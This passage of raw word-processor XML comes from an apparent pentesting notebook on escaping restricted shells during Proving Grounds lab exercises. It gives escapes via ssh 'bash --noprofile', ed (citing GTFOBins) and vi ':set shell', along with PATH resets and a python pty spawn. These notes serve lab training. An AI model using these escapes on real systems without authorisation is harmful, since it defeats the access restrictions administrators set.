    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003442">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bue5w2rlo7jq" w:id="471"/>
      <w:bookmarkEnd w:id="471"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escaping restricted shell using SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003443">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003444">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh joe@funbox.fritz.box </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t "bash --noprofile"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003445">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Helps escape a restricted shell (like rbash) by starting a new instance of bash without loading profile files, which often include the restrictions or configurations that enforce the restricted environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003446">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="941"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the funbox PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003447">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003448">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then if you still see can't use commands, try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003449">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="589"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000344A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="589"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This adds common system binary directories (like sbin, bin) to your current shell's PATH variable. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000344B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="589"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the Sunset Decoy PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000344C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000344D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000344E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h0m2k3m6p0ji" w:id="472"/>
      <w:bookmarkEnd w:id="472"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escaping restricted shell using ed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000344F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003450">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId1137">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Peppo</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3451">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003452">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="876300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="420" name="image403.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image403.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1138"/>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3453">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003454">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see that we have access to the "ed" binary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003455">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003456">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After looking at GTFOBins, we see that ed has a "shell" section that allows us to get interactive shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003457">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1663700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="449" name="image445.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image445.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1139"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="166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458">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003459">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After running the above command we can export a new path and then spawn a python shell then again export the path to have full function over the shell session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000345A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000345B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5931017" cy="1494941"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="190" name="image178.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image178.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1140"/>
                    <a:srcRect b="0" l="0" r="41506" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5931017" cy="1494941"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000345C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1352"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000345D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1352"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python -c 'import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000345E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1352"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000345F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1352"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Idk how they did it without the "export" command but if this doesn't work, just try prepending with "export"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003460">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1427"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003462">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003463">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003464">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003465">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_brojlv1qs641" w:id="473"/>
      <w:bookmarkEnd w:id="473"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escaping restricted shell using vi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003466">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003467">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Vi binary gives us the opportunity to escape the restricted shell. Once you open Vi, use the commands below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003468">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003469">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:set shell=/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000346A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="692"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This sets the default shell that vi uses when you run :shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000346B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="692"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, vi might use /bin/sh or /usr/bin/zsh or whatever is specified by SHELL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000346C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="692"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This only lasts while the Vi session is open. Once it closes, you will need to run this command again</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000346D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000346E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command drops you into a shell from inside vi (this is a subshell)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000346F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It will look like you are in the regular terminal, but your not. To test this, use the command "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and if you get sent back to Vi, then you were in the Vi subshell. To get back in, just type </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:shell </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">again</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003470">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since you just set the shell to /bin/bash, this spawns a normal Bash shell, not rbash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003471">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is possible because vi is a whitelisted binary in your PATH, and rbash doesn't prevent shell escape inside vi.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003472">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003473">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
